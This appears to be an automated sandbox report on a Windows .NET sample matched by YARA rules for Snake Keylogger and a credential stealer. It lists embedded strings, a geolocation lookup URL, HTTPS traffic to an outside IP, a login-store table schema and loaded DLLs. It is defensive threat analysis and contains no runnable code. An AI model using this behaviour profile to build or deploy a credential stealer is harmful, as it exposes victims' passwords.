Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/XL
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2

                          System Summary

Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECC146
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECD278
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC5362
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECC468
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECC738
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC29E0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC69A0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECE988
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECCA08
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECCCD8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC9DE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC6FC8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECCFAA
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECF62F
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECE97A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00ECFA88
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_00EC3E09
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06708688
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06701288
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06704168
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06708D58
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06700BA8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06701970
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E950
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670F658
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670F649
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670C690
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670C680
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670D7F0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670D7EF
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E4F8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E4E8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670127A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670C238
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670F200
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670D398
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670D38A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06700040
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E0A0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E091
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06704159
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670F1F0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670CF40
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670CF31
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670CF3F
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670DC48
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670DC38
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06707CE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670BDE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670BDCF
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670EDA8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670ED99
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670CAE8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670CAD9
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670FAB0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670FAA0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06700B97
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_06701962
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Code function: 0_2_0670E942
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000000.1233400753.0000000000746000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Binary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.winEXE@2/5@3/3
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6764
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c527140-ec93-4d74-952c-f67b035320fa
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe | File read: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
                          Source: unknownProcess created: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe "C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: iphlpapi.dll
